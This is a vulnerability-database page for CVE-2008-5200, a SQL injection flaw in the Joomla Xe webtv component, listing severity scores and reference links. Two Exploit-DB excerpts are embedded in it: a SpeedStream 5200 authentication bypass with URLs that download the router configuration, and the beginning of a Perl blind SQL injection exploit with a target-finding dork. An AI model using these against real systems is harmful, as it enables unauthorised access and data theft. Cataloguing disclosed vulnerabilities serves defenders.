CVE-2008-5200
published 2008-11-21CVE-2008-5200: SQL injection vulnerability in the Xe webtv (com_xewebtv) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.04%
59.8th percentile
SQL injection vulnerability in the Xe webtv (com_xewebtv) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a detail action to index.php.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SpeedStream 5200 - Authentication Bypass Configuration Download
exploitdb·2008-11-07
CVE-2008-6916 SpeedStream 5200 - Authentication Bypass Configuration Download
SpeedStream 5200 - Authentication Bypass Configuration Download
---
######################################################################################
SpeedStream 5200 Authentication Bypass - hkm 12/10/2008
(Server: NetPort Software 1.1)
It is posible to bypass authentication by modifying the Host header.
If you use a Host that is not the authentic one it will not require authentication.
http://189.255.255.255./ - This would bypass authentication too.
http://189.255.255.255./x.cfg - This downloads the full router conifguration.
hkm [ @ ] hakim.ws
######################################################################################
# milw0rm.com [2008-11-07]
Exploit-DB
Joomla! Component Xe webtv - 'id' Blind SQL Injection
exploitdb·2008-06-28
CVE-2008-5200 Joomla! Component Xe webtv - 'id' Blind SQL Injection
Joomla! Component Xe webtv - 'id' Blind SQL Injection
---
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ################################################################\n";
print " # Joomla Component Xe webtv Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.dz-secure.com #\n";
print " # http://www.palcastle.org/cc #\n";
print " # #\n";
print " # Dork: inurl:com_xewebtv #\n";
print " # Usage: perl xewebtv.pl host path #\n";
print " # Example: perl xewebtv.pl www.host.com /joomla/ -t 11 -c 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -t Valid tv id #\
No writeups or analysis indexed.
http://securityreason.com/securityalert/4643http://www.securityfocus.com/bid/30006http://www.vupen.com/english/advisories/2008/1974/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43469https://www.exploit-db.com/exploits/5966http://securityreason.com/securityalert/4643http://www.securityfocus.com/bid/30006http://www.vupen.com/english/advisories/2008/1974/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43469https://www.exploit-db.com/exploits/5966
2008-11-21
Published